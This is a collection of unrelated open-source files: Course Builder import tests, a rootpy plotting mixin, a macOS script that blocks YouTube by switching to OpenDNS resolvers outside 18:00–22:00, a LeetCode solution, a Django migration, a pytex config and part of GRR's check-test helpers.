# Method name determined by superclass. pylint: disable-msg=g-bad-name
def setUp(self):
super(TransformsJsonFileTestCase, self).setUp()
# Treat as module-protected. pylint: disable-msg=protected-access
# Reader and writer point at the same file; each test writes with one
# handle and reads back with the other.
self.path = os.path.join(self.test_tempdir, 'file.json')
self.reader = transforms.JsonFile(self.path)
self.writer = transforms.JsonFile(self.path)
# Sample records: a scalar and a nested dict.
self.first = 1
self.second = {'c': 'c_value', 'd': {'nested': 'e'}}
def tearDown(self):
self.reader.close()
self.writer.close()
super(TransformsJsonFileTestCase, self).tearDown()
def test_round_trip_of_file_with_zero_records(self):
self.writer.open('w')
self.writer.close()
self.reader.open('r')
# Both the iterator protocol and read() must agree on emptiness.
self.assertEqual([], [entity for entity in self.reader])
self.reader.reset()
self.assertEqual({'rows': []}, self.reader.read())
def test_round_trip_of_file_with_one_record(self):
self.writer.open('w')
self.writer.write(self.first)
self.writer.close()
self.reader.open('r')
self.assertEqual([self.first], [entity for entity in self.reader])
self.reader.reset()
self.assertEqual({'rows': [self.first]}, self.reader.read())
def test_round_trip_of_file_with_multiple_records(self):
self.writer.open('w')
self.writer.write(self.first)
self.writer.write(self.second)
self.writer.close()
self.reader.open('r')
self.assertEqual(
[self.first, self.second], [entity for entity in self.reader])
self.reader.reset()
self.assertEqual(
{'rows': [self.first, self.second]}, self.reader.read())
class ImportActivityTests(DatastoreBackedCourseTest):
"""Functional tests for importing legacy activities into lessons."""
URI = '/rest/course/lesson/activity'
FREETEXT_QUESTION = """
var activity = [
{ questionType: 'freetext',
correctAnswerRegex: /abc/i,
correctAnswerOutput: "Correct.",
incorrectAnswerOutput: "Try again.",
showAnswerOutput: "A hint."
}
];
"""
MULTPLE_CHOICE_QUESTION = """
var activity = [
{questionType: 'multiple choice',
choices: [
['a', false, 'A'],
['b', true, 'B'],
['c', false, 'C'],
['d', false, 'D']
]
}
];
"""
MULTPLE_CHOICE_GROUP_QUESTION = """
var activity = [
{questionType: 'multiple choice group',
questionsList: [
{
questionHTML: 'choose a',
choices: ['aa', 'bb'],
correctIndex: 0
},
{
questionHTML: 'choose b or c',
choices: ['aa', 'bb', 'cc'],
correctIndex: [1, 2]
}
]
allCorrectOutput: 'unused',
someIncorrectOutput: 'also unused'
}
];
"""
def setUp(self):
super(ImportActivityTests, self).setUp()
course = courses.Course(None, app_context=self.app_context)
self.unit = course.add_unit()
self.lesson = course.add_lesson(self.unit)
course.update_lesson(self.lesson)
course.save()
email = 'test_admin@google.com'
actions.login(email, is_admin=True)
def load_dto(self, dao, entity_id):
old_namespace = namespace_manager.get_namespace()
new_namespace = self.app_context.get_namespace_name()
try:
namespace_manager.set_namespace(new_namespace)
return dao.load(entity_id)
finally:
namespace_manager.set_namespace(old_namespace)
def get_response_dict(self, activity_text):
request = {
'xsrf_token': XsrfTokenManager.create_xsrf_token('lesson-edit'),
'key': self.lesson.lesson_id,
'text': activity_text
}
response = self.testapp.put(
self.URI, params={'request': transforms.dumps(request)})
return transforms.loads(response.body)
def get_content_from_service(self, activity_text):
response_dict = self.get_response_dict(activity_text)
self.assertEqual(response_dict['status'], 200)
return transforms.loads(response_dict['payload'])['content']
def test_import_multiple_choice(self):
"""Should be able to import a single multiple choice question."""
content = self.get_content_from_service(self.MULTPLE_CHOICE_QUESTION)
m = re.match((
r'^<question quid="(\d+)" instanceid="[a-zA-Z0-9]{12}">'
r'</question>$'), content)
assert m
quid = m.group(1)
question = self.load_dto(models.QuestionDAO, quid)
self.assertEqual(question.type, models.QuestionDTO.MULTIPLE_CHOICE)
self.assertEqual(question.dict['version'], '1.5')
self.assertEqual(
question.dict['description'],
'Imported from unit "New Unit", lesson "New Lesson" (question #1)')
self.assertEqual(question.dict['question'], '')
self.assertEqual(question.dict['multiple_selections'], False)
self.assertEqual(len(question.dict['choices']), 4)
choices = question.dict['choices']
choices_data = [
['a', 0.0, 'A'], ['b', 1.0, 'B'], ['c', 0.0, 'C'],
['d', 0.0, 'D']]
for i, choice in enumerate(choices):
self.assertEqual(choice['text'], choices_data[i][0])
self.assertEqual(choice['score'], choices_data[i][1])
self.assertEqual(choice['feedback'], choices_data[i][2])
def test_import_multiple_choice_group(self):
"""Should be able to import a single 'multiple choice group'."""
content = self.get_content_from_service(
self.MULTPLE_CHOICE_GROUP_QUESTION)
# The tag links to a question group which embeds two questions
m = re.match((
r'^<question-group qgid="(\d+)" instanceid="[a-zA-Z0-9]{12}">'
r'</question-group>$'), content)
assert m
quid = m.group(1)
question_group = self.load_dto(models.QuestionGroupDAO, quid)
self.assertEqual(question_group.dict['version'], '1.5')
self.assertEqual(
question_group.dict['description'],
'Imported from unit "New Unit", lesson "New Lesson" (question #1)')
self.assertEqual(len(question_group.dict['items']), 2)
items = question_group.dict['items']
self.assertEqual(items[0]['weight'], 1.0)
self.assertEqual(items[1]['weight'], 1.0)
# The first question is multiple choice with single selection
quid = items[0]['question']
question = self.load_dto(models.QuestionDAO, quid)
self.assertEqual(question.type, models.QuestionDTO.MULTIPLE_CHOICE)
self.assertEqual(question.dict['version'], '1.5')
self.assertEqual(
question.dict['description'],
(
'Imported from unit "New Unit", lesson "New Lesson" '
'(question #1, part #1)'))
self.assertEqual(question.dict['question'], 'choose a')
self.assertEqual(question.dict['multiple_selections'], False)
self.assertEqual(len(question.dict['choices']), 2)
choices = question.dict['choices']
self.assertEqual(choices[0]['text'], 'aa')
self.assertEqual(choices[0]['score'], 1.0)
self.assertEqual(choices[1]['text'], 'bb')
self.assertEqual(choices[1]['score'], 0.0)
# The second question is multiple choice with multiple selection
quid = items[1]['question']
question = self.load_dto(models.QuestionDAO, quid)
self.assertEqual(question.type, models.QuestionDTO.MULTIPLE_CHOICE)
self.assertEqual(question.dict['version'], '1.5')
self.assertEqual(
question.dict['description'],
(
'Imported from unit "New Unit", lesson "New Lesson" '
'(question #1, part #2)'))
self.assertEqual(question.dict['question'], 'choose b or c')
self.assertEqual(question.dict['multiple_selections'], True)
self.assertEqual(len(question.dict['choices']), 3)
choices = question.dict['choices']
self.assertEqual(choices[0]['text'], 'aa')
self.assertEqual(choices[0]['score'], -1.0)
self.assertEqual(choices[1]['text'], 'bb')
self.assertEqual(choices[1]['score'], 0.5)
self.assertEqual(choices[1]['text'], 'bb')
self.assertEqual(choices[1]['score'], 0.5)
def test_import_freetext(self):
"""Should be able to import a single feettext question."""
content = self.get_content_from_service(self.FREETEXT_QUESTION)
m = re.match((
r'^<question quid="(\d+)" instanceid="[a-zA-Z0-9]{12}">'
r'</question>$'), content)
assert m
quid = m.group(1)
question = self.load_dto(models.QuestionDAO, quid)
self.assertEqual(question.type, models.QuestionDTO.SHORT_ANSWER)
self.assertEqual(question.dict['version'], '1.5')
self.assertEqual(
question.dict['description'],
'Imported from unit "New Unit", lesson "New Lesson" (question #1)')
self.assertEqual(question.dict['question'], '')
self.assertEqual(question.dict['hint'], 'A hint.')
self.assertEqual(question.dict['defaultFeedback'], 'Try again.')
self.assertEqual(len(question.dict['graders']), 1)
grader = question.dict['graders'][0]
self.assertEqual(grader['score'], 1.0)
self.assertEqual(grader['matcher'], 'regex')
self.assertEqual(grader['response'], '/abc/i')
self.assertEqual(grader['feedback'], 'Correct.')
def test_repeated_imports_are_rejected(self):
response_dict = self.get_response_dict(self.FREETEXT_QUESTION)
self.assertEqual(response_dict['status'], 200)
response_dict = self.get_response_dict(self.FREETEXT_QUESTION)
self.assertEqual(response_dict['status'], 412)
self.assertTrue(response_dict['message'].startswith(
'This activity has already been imported.'))
def test_user_must_be_logged_in(self):
actions.logout()
try:
self.get_response_dict(self.FREETEXT_QUESTION)
self.fail('Expected 404')
except AppError:
pass
def test_user_must_have_valid_xsrf_token(self):
request = {
'key': self.lesson.lesson_id,
'text': self.FREETEXT_QUESTION
}
response = self.testapp.put(
self.URI, params={'request': transforms.dumps(request)})
response_dict = transforms.loads(response.body)
self.assertEqual(response_dict['status'], 403)
# Test suites that should be re-run under every alternative environment.
ALL_COURSE_TESTS = (
StudentAspectTest, AssessmentTest, CourseAuthorAspectTest,
StaticHandlerTest, AdminAspectTest, PeerReviewControllerTest,
PeerReviewDashboardTest, PeerReviewAnalyticsTest)
# Inject the suites as extra base classes at import time so each
# environment wrapper inherits (and therefore re-executes) all of them.
MemcacheTest.__bases__ += (InfrastructureTest,) + ALL_COURSE_TESTS
CourseUrlRewritingTest.__bases__ += ALL_COURSE_TESTS
VirtualFileSystemTest.__bases__ += ALL_COURSE_TESTS
DatastoreBackedSampleCourseTest.__bases__ += ALL_COURSE_TESTS
| atljohnsen/adlcoursebuilder | tests/functional/test_classes.py | Python | apache-2.0 | 157,784 |
# Copyright 2012 the rootpy developers
# distributed under the terms of the GNU General Public License
from __future__ import absolute_import
import ROOT
from .. import QROOT, asrootpy
from ..base import Object
from .utils import canvases_with
__all__ = [
'Pave',
'PaveStats',
]
# Valid values for the `anchor` keyword of _Positionable: the corner that
# stays fixed when width/height is resized.
ANCHORS = (
'upper left', 'upper right',
'lower left', 'lower right',
)
# This is another _PadBase hack. See this comment on github
# https://github.com/rootpy/rootpy/pull/342#issuecomment-19864883
class _Positionable(object):
    """Mixin providing position and size accessors for TPave-like boxes.

    Plain accessors (``x1`` ... ``position``, ``width``, ``height``) work in
    ROOT's normalized pad coordinates; the ``*_pixels`` variants convert to
    and from pixels using the *current* pad and therefore require ``gPad``
    to be set.  ``anchor`` selects which corner stays fixed when the width
    or height is changed.

    Refactor: the gPad lookup/validation that was duplicated in every pixel
    accessor now lives in ``_current_pad``, and the previously inconsistent
    'getting'/'setting' wording of the error message is normalized (getters
    say 'getting', setters say 'setting').
    """

    def __init__(self, *args, **kwargs):
        # `anchor` is consumed here; remaining args go to the ROOT base.
        self.anchor = kwargs.pop('anchor', 'upper left')
        if self.anchor not in ANCHORS:
            raise ValueError(
                "'{0}' is not a valid anchor position. Use one of {1}".format(
                    self.anchor, ', '.join(ANCHORS)))
        super(_Positionable, self).__init__(*args, **kwargs)

    @staticmethod
    def _current_pad(action):
        """Return the current pad, or raise RuntimeError if there is none.

        `action` ('getting' or 'setting') is interpolated into the message.
        """
        pad = asrootpy(ROOT.gPad.func())
        if not pad:
            raise RuntimeError(
                "create a pad before {0} position in pixels".format(action))
        return pad

    @property
    def x1(self):
        return self.GetX1()

    @x1.setter
    def x1(self, value):
        self.SetX1(value)

    @property
    def x2(self):
        return self.GetX2()

    @x2.setter
    def x2(self, value):
        self.SetX2(value)

    @property
    def y1(self):
        return self.GetY1()

    @y1.setter
    def y1(self, value):
        self.SetY1(value)

    @property
    def y2(self):
        return self.GetY2()

    @y2.setter
    def y2(self, value):
        self.SetY2(value)

    @property
    def x1_pixels(self):
        return int(self.GetX1() * self._current_pad('getting').width_pixels)

    @x1_pixels.setter
    def x1_pixels(self, value):
        self.SetX1(value / float(self._current_pad('setting').width_pixels))

    @property
    def x2_pixels(self):
        return int(self.GetX2() * self._current_pad('getting').width_pixels)

    @x2_pixels.setter
    def x2_pixels(self, value):
        self.SetX2(value / float(self._current_pad('setting').width_pixels))

    @property
    def y1_pixels(self):
        return int(self.GetY1() * self._current_pad('getting').height_pixels)

    @y1_pixels.setter
    def y1_pixels(self, value):
        self.SetY1(value / float(self._current_pad('setting').height_pixels))

    @property
    def y2_pixels(self):
        return int(self.GetY2() * self._current_pad('getting').height_pixels)

    @y2_pixels.setter
    def y2_pixels(self, value):
        self.SetY2(value / float(self._current_pad('setting').height_pixels))

    @property
    def position(self):
        """(x1, y1, x2, y2) in normalized pad coordinates."""
        return (self.GetX1(), self.GetY1(),
                self.GetX2(), self.GetY2())

    @position.setter
    def position(self, value):
        x1, y1, x2, y2 = value
        self.SetX1(x1)
        self.SetY1(y1)
        self.SetX2(x2)
        self.SetY2(y2)
        # Mark every canvas containing this box as needing a repaint.
        for c in canvases_with(self):
            c.Modified()

    @property
    def position_pixels(self):
        """(x1, y1, x2, y2) in pixels of the current pad."""
        pad = self._current_pad('getting')
        width = pad.width_pixels
        height = pad.height_pixels
        x1, y1, x2, y2 = self.position
        return (int(x1 * width), int(y1 * height),
                int(x2 * width), int(y2 * height))

    @position_pixels.setter
    def position_pixels(self, value):
        pad = self._current_pad('setting')
        width = float(pad.width_pixels)
        height = float(pad.height_pixels)
        x1, y1, x2, y2 = value
        self.position = (x1 / width, y1 / height,
                         x2 / width, y2 / height)

    @property
    def height(self):
        return abs(self.GetY2() - self.GetY1())

    @height.setter
    def height(self, value):
        # Keep the anchored edge fixed; move the opposite one.
        if 'upper' in self.anchor:
            self.SetY1(self.GetY2() - value)
        else:
            self.SetY2(self.GetY1() + value)

    @property
    def width(self):
        return abs(self.GetX2() - self.GetX1())

    @width.setter
    def width(self, value):
        if 'left' in self.anchor:
            self.SetX2(self.GetX1() + value)
        else:
            self.SetX1(self.GetX2() - value)

    @property
    def height_pixels(self):
        return int(self.height * self._current_pad('getting').height_pixels)

    @height_pixels.setter
    def height_pixels(self, value):
        pad = self._current_pad('setting')
        if 'upper' in self.anchor:
            self.SetY1(self.GetY2() - value / float(pad.height_pixels))
        else:
            self.SetY2(self.GetY1() + value / float(pad.height_pixels))

    @property
    def width_pixels(self):
        return int(self.width * self._current_pad('getting').width_pixels)

    @width_pixels.setter
    def width_pixels(self, value):
        pad = self._current_pad('setting')
        if 'left' in self.anchor:
            self.SetX2(self.GetX1() + value / float(pad.width_pixels))
        else:
            self.SetX1(self.GetX2() - value / float(pad.width_pixels))
class Pave(_Positionable, Object, QROOT.TPave):
"""rootpy wrapper for ROOT's TPave with anchored positioning accessors."""
_ROOT = QROOT.TPave
class PaveStats(_Positionable, Object, QROOT.TPaveStats):
"""rootpy wrapper for ROOT's TPaveStats with anchored positioning."""
_ROOT = QROOT.TPaveStats
| cms-btv-pog/rootpy | rootpy/plotting/box.py | Python | gpl-3.0 | 6,943 |
#!/usr/bin/python
# frederico@marques.cx
# tubenot.py - Blocks YouTube via OpenDNS. Works with Mac OS X 10.9.5 (Mavericks)
# run as root
from datetime import datetime
import sys
import subprocess
import os
# Absolute paths to the external tools used below (macOS locations).
curl = '/usr/bin/curl'
networksetup = '/usr/sbin/networksetup'
# To get a list of network services run "networksetup listallnetworkservices"
netservice = 'Wi-Fi'
# OpenDNS account
# NOTE(review): os.getenv returns None when the variable is unset; the
# script would then fail with a TypeError when concatenating credentials.
odns_user = os.getenv('ODNS_USER')
odns_pass = os.getenv('ODNS_PASS')
# OpenDNS public resolver pair, space-separated for networksetup.
odns_resolvers = '208.67.222.222 208.67.220.220'
def get_hour():
    """Return the current local hour of day as an int in [0, 23]."""
    now = datetime.now()
    return now.hour
def flush_dnscache():
"""Flush the local DNS cache by sending SIGHUP to mDNSResponder."""
os.system("killall -HUP mDNSResponder")
def update_opendns():
"""Report this machine's public IP to OpenDNS; return 1 on success, 0 on failure."""
print "Updating IP with OpenDNS"
# NOTE(review): credentials are interpolated into a shell=True command
# line, so they appear in `ps` output and would break (or allow
# injection) if they ever contain shell metacharacters.
command = curl + " -s -S -u " + odns_user + ":" + odns_pass + " https://updates.opendns.com/nic/update?hostname=blah"
try:
c = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
result, err = c.communicate()
# The nic/update API responds with a body containing 'good' on success.
if result.find('good') == -1:
print >>sys.stderr, "Error!", result
return 0
else:
print "updated", result
return 1
except OSError, err:
print >>sys.stderr, "Execution failed:", err
return 0
def update_resolvers(action):
"""Switch the network service's DNS servers.

action: 'allow' removes the custom resolvers (YouTube reachable);
'deny' registers this IP with OpenDNS and installs its resolvers.
Only acts when the current state differs from the requested one.
"""
print action
getdns = subprocess.Popen(networksetup + " -getdnsservers " + netservice, shell=True, stdout=subprocess.PIPE)
result, err = getdns.communicate()
# networksetup prints "There aren't any DNS Servers set ..." when the
# service uses DHCP-provided DNS; use that marker to detect state.
if action == "allow" and 'any DNS Servers set' not in result:
print "OpenDNS resolvers detected, deleting"
os.system(networksetup + " -setdnsservers " + netservice + " 'empty'")
flush_dnscache()
elif action == "deny" and 'any DNS Servers set' in result:
print "Adding OpenDNS resolvers"
update_opendns()
os.system(networksetup + " -setdnsservers " + netservice + " " + odns_resolvers)
flush_dnscache()
else:
print "Do nothing"
# Script entry point: allow YouTube from 18:00 to 21:59 local time and
# block it otherwise. NOTE(review): no `if __name__ == '__main__'` guard,
# so importing this module runs the switch immediately.
hour = get_hour()
if hour >= 18 and hour < 22:
print "Allowing YouTube", hour
update_resolvers('allow')
else:
print "Denying YouTube", hour
update_resolvers('deny') | vonfreud/tubenot | tubenot.py | Python | apache-2.0 | 2,107 |
# -*- encoding: utf-8 -*-
'''
Given a binary tree, determine if it is height-balanced.
For this problem, a height-balanced binary tree is defined as a binary tree in which the depth of the two subtrees of every node never differ by more than 1.
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    """LeetCode 110: decide whether a binary tree is height-balanced.

    A tree is height-balanced when, for every node, the heights of its two
    subtrees differ by at most 1.
    """

    def isBalanced(self, root):
        """
        :type root: TreeNode
        :rtype: bool
        """
        return self.traverse(root)[1]

    def traverse(self, root):
        """Return (height, balanced) for the subtree rooted at `root`.

        Short-circuits: as soon as any subtree is unbalanced the result
        propagates up without computing further heights.
        """
        if root is None:  # fixed: identity check instead of `== None`
            return 0, True
        left_height, ok = self.traverse(root.left)
        if not ok:
            return left_height, False
        right_height, ok = self.traverse(root.right)
        if not ok:
            return right_height, False
        if abs(left_height - right_height) > 1:
            return max(left_height, right_height), False
        # Height of this node is one more than its tallest subtree.
        return max(left_height, right_height) + 1, True
| weixsong/algorithm | leetcode/110.py | Python | mit | 1,004 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import datetime
class Migration(migrations.Migration):
    """Auto-generated schema tweaks for the delivery app (2015-11-13).

    Mostly makes the ``created_at``/``updated_at`` timestamp columns nullable
    across the delivery models.  NOTE: the ``delivery.name`` default below is
    a datetime string baked in at generation time, not a callable — every row
    created without a name gets the same literal value.
    """

    dependencies = [
        ('delivery', '0040_auto_20151101_1833'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='mailaccount',
            options={'ordering': ['-created_at'], 'get_latest_by': 'pk', 'verbose_name': 'SMTP Account', 'verbose_name_plural': 'SMTP Accounts'},
        ),
        # Intentionally disabled AddField kept for reference (adds an
        # "account is automatically active" boolean to mailaccount).
        #migrations.AddField(
        #    model_name='mailaccount',
        #    name='is_auto_active',
        #    field=models.BooleanField(default=True, verbose_name='\u0410\u043a\u043a\u0430\u0443\u043d\u0442 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0439'),
        #),
        migrations.AlterField(
            model_name='delivery',
            name='created_at',
            field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
        ),
        # See class docstring: generation-time datetime literal as default.
        migrations.AlterField(
            model_name='delivery',
            name='name',
            field=models.CharField(default=b'2015-11-13T17:40:59.862534', max_length=128, null=True, verbose_name='\u0418\u043c\u044f \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0438', blank=True),
        ),
        migrations.AlterField(
            model_name='delivery',
            name='updated_at',
            field=models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f', null=True),
        ),
        migrations.AlterField(
            model_name='emailfordelivery',
            name='created_at',
            field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
        ),
        migrations.AlterField(
            model_name='emailfordelivery',
            name='updated_at',
            field=models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f', null=True),
        ),
        migrations.AlterField(
            model_name='emailmiddledelivery',
            name='created_at',
            field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
        ),
        migrations.AlterField(
            model_name='emailmiddledelivery',
            name='updated_at',
            field=models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f', null=True),
        ),
        migrations.AlterField(
            model_name='mailaccount',
            name='created_at',
            field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
        ),
        migrations.AlterField(
            model_name='mailaccount',
            name='updated_at',
            field=models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f', null=True),
        ),
        migrations.AlterField(
            model_name='mailserver',
            name='created_at',
            field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
        ),
        migrations.AlterField(
            model_name='mailserver',
            name='updated_at',
            field=models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f', null=True),
        ),
        migrations.AlterField(
            model_name='spamemail',
            name='created_at',
            field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
        ),
        migrations.AlterField(
            model_name='spamemail',
            name='email',
            field=models.EmailField(max_length=254, verbose_name='E-Mail'),
        ),
        migrations.AlterField(
            model_name='traceofvisits',
            name='created_at',
            field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
        ),
    ]
| AlexStarov/Shop | applications/delivery/migrations/0041_auto_20151113_1741.py | Python | apache-2.0 | 4,641 |
#! /usr/bin/python
# -*- coding: utf8 -*-
from __future__ import unicode_literals
import LaTeXparser
import LaTeXparser.PytexTools
import commons
import plugins_agreg
# Build the pytex request used to assemble the "mesure" example document.
myRequest = LaTeXparser.PytexTools.Request("mesure")
myRequest.ok_hash = commons.ok_hash
myRequest.add_plugin(plugins_agreg.set_isAgreg, "before_pytex")

myRequest.original_filename = "mazhe.tex"

# Whitelist of chapter files admitted into this compilation; "<++>" entries
# are editor placeholders kept verbatim from the template.
myRequest.ok_filenames_list = ["e_mazhe"]
for chapter in ("gardeFrido",
                "43_mesure",
                "56_espace_vecto_norme",
                "<++>",
                "<++>",
                "<++>",
                "<++>",
                "134_choses_finales"):
    myRequest.ok_filenames_list.append(chapter)

myRequest.new_output_filename = "0-exemple.pdf"
| LaurentClaessens/frtex | src/test/java/latex/mazhe_tex_test/lst_exemple.py | Python | gpl-3.0 | 853 |
#!/usr/bin/env python
"""A library for check-specific tests."""
import collections
import os
import StringIO
import yaml
from grr.lib import config_lib
from grr.lib import registry
from grr.lib import test_lib
from grr.lib import type_info
from grr.lib.checks import checks
from grr.lib.checks import filters
from grr.lib.checks import hints
from grr.lib.rdfvalues import anomaly as rdf_anomaly
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import paths as rdf_paths
from grr.parsers import linux_service_parser
class HostCheckTest(test_lib.GRRBaseTest):
  """The base class for host check tests."""

  __metaclass__ = registry.MetaclassRegistry

  # Class-level cache of loaded check configurations, keyed by
  # "<cfg path>:<check ids>".  Shared across all subclasses so each
  # configuration file is parsed at most once per test run.
  loaded_checks = None

  @classmethod
  def LoadCheck(cls, cfg_file, *check_ids):
    """Loads checks from a file once per Test class.

    LoadCheck will read a file containing a check configuration and instantiate
    the checks from it. Specific checks can be selected by providing the check
    ids that should be loaded from the file.

    Checks are stored as a class attribute to prevent re-loading as each test
    method is set up.

    Args:
      cfg_file: A path to the file that should be read.
      *check_ids: A list of check ids that should be loaded from the file.

    Returns:
      The loaded check objects.
    """
    if HostCheckTest.loaded_checks is None:
      HostCheckTest.loaded_checks = {}
    cfg = os.path.join(config_lib.CONFIG["Test.srcdir"], "grr", "checks",
                       cfg_file)
    if check_ids:
      key = "%s:%s" % (cfg, ",".join(check_ids))
      if key in HostCheckTest.loaded_checks:
        return HostCheckTest.loaded_checks[key]
      loaded = []
      for chk_id in check_ids:
        loaded.append(checks.LoadCheckFromFile(cfg, chk_id))
      HostCheckTest.loaded_checks[key] = loaded
      return loaded
    else:
      # No ids given: load every check in the file.  NOTE(review): this cache
      # key uses cfg_file (relative name) while the filtered branch above uses
      # the absolute cfg path — confirm this asymmetry is intentional.
      key = "%s:*" % cfg_file
      if key in HostCheckTest.loaded_checks:
        return HostCheckTest.loaded_checks[key]
      else:
        result = checks.LoadChecksFromFiles([cfg])
        HostCheckTest.loaded_checks[key] = result
        return result

  def TestDataPath(self, file_name):
    """Generates a full path to the test data.

    Raises:
      test_lib.Error: if the test data file does not exist.
    """
    path = os.path.join(config_lib.CONFIG["Test.data_dir"], file_name)
    if not os.path.isfile(path):
      raise test_lib.Error("Missing test data: %s" % file_name)
    return path

  @classmethod
  def SetKnowledgeBase(cls, hostname="test.example.com", host_os="Linux",
                       host_data=None):
    """Generates a KnowledgeBase entry in the host_data used by checks."""
    if not host_data:
      host_data = {}
    kb = rdf_client.KnowledgeBase()
    kb.hostname = hostname
    kb.os = host_os
    host_data["KnowledgeBase"] = kb
    return host_data

  def SetArtifactData(self, anomaly=None, parsed=None, raw=None, results=None):
    """Adds data in the format required by host_data.

    Appends to an existing results dict when one is passed, otherwise starts
    a fresh {"ANOMALY": [], "PARSER": [], "RAW": []} mapping.
    """
    if not results:
      results = {"ANOMALY": [], "PARSER": [], "RAW": []}
    results["ANOMALY"].extend(anomaly or [])
    results["PARSER"].extend(parsed or [])
    results["RAW"].extend(raw or [])
    return results

  def AddData(self, parser, *args, **kwargs):
    """Initialize the parser and add parsed data to host_data."""
    # parser is a class; it is instantiated here and Parse() is invoked once.
    return [parser().Parse(*args, **kwargs)]

  def AddListener(self, ip, port, family="INET", sock_type="SOCK_STREAM"):
    """Create a network connection in the LISTEN state."""
    conn = rdf_client.NetworkConnection()
    conn.state = "LISTEN"
    conn.family = family
    conn.type = sock_type
    conn.local_address = rdf_client.NetworkEndpoint(ip=ip, port=port)
    return conn

  def RunChecks(self, host_data, labels=None, restrict_checks=None):
    """Runs the registered checks against the provided host data.

    Args:
      host_data: A dictionary of artifact_names and results. Results are, in
        turn, a dictionary of {'ANOMALY': [], 'PARSED': [], 'RAW': []} items.
      labels: Additional labels attached to the host.
      restrict_checks: A list specifying a subset of check_ids to run.

    Returns:
      A dict mapping check_id to its CheckResult.
    """
    return {r.check_id: r for r in checks.CheckHost(
        host_data, labels=labels, restrict_checks=restrict_checks)}

  def GetCheckErrors(self, check_spec):
    """Collect errors generated by host checking tools."""
    errors = []
    try:
      check = checks.Check(**check_spec)
      check.Validate()
    except (checks.Error, filters.Error, hints.Error, type_info.Error) as e:
      errors.append(str(e))
    except Exception as e:
      # TODO(user): More granular exception handling.
      errors.append("Unknown error %s: %s" % (type(e), e))
    return errors

  def CreateStat(self, path, uid=0, gid=0, mode=0o0100640):
    """Given path, uid, gid and file mode, this returns a StatEntry.

    The default mode is a regular file with 0640 permissions.
    """
    pathspec = rdf_paths.PathSpec(path=path, pathtype="OS")
    return rdf_client.StatEntry(pathspec=pathspec, st_uid=uid, st_gid=gid,
                                st_mode=mode)

  def _AddToHostData(self, host_data, artifact, data, parser):
    """Parse raw data collected for an artifact into the host_data table."""
    # NOTE(review): type(...) != dict also rejects dict subclasses; confirm
    # that strictness is intended before relaxing to isinstance().
    if type(data) != dict:
      raise test_lib.Error("Data for %s is not of type dictionary." % artifact)
    rdfs = []
    stats = []
    files = []
    for path, lines in data.items():
      stat = self.CreateStat(path)
      stats.append(stat)
      file_obj = StringIO.StringIO(lines)
      files.append(file_obj)
      if not parser.process_together:
        rdfs.extend(list(parser.Parse(stat, file_obj, None)))
    # Parsers that need the full file set are invoked once, after the loop.
    if parser.process_together:
      rdfs = list(parser.ParseMultiple(stats, files, None))
    host_data[artifact] = self.SetArtifactData(
        anomaly=[a for a in rdfs if isinstance(a, rdf_anomaly.Anomaly)],
        parsed=[r for r in rdfs if not isinstance(r, rdf_anomaly.Anomaly)],
        raw=stats, results=host_data.get(artifact))
    return host_data

  def GenResults(self, artifact_list, sources_list, parser_list=None):
    """Given a list of artifacts, sources and parsers, will RunChecks on them.

    Sample: (["Artifact1", "Artifact2"], [artifact1_data, artifact2_data],
    [config_file.artifact1_Parser(), config_file.artifact2_Parser()]

    artifact1_Parser().parse will run on artifact1_data & parsed results, along
    with raw and anomalies will be inserted into the host_data["Artifact1"].

    artifact2_Parser().parse will run on artifact2_data & parsed results, along
    with raw and anomalies will be inserted into the host_data["Artifact2"].

    Once artifacts added to host_data, loaded checks will be run against it.

    Args:
      artifact_list: list of artifacts to add to host_data for running checks
      sources_list: list of dictionaries containing file names and file data.
        If parser_list is empty then sources_list must contain a list of lists
        containing StatEntry or lists of other raw artifact data.
      parser_list: list of parsers to apply to file data from sources_list.
        This can be empty if no parser is to be applied.

    Returns:
      CheckResult containing any findings in sources_list against loaded checks.
    """
    if parser_list is None:
      parser_list = [None] * len(artifact_list)
    # make sure all vars are lists
    if any(type(lst) != list for lst in [artifact_list, sources_list,
                                         parser_list]):
      raise test_lib.Error("All inputs are not lists.")
    # make sure all lists are of equal length
    if any(len(lst) != len(artifact_list) for lst in [sources_list,
                                                      parser_list]):
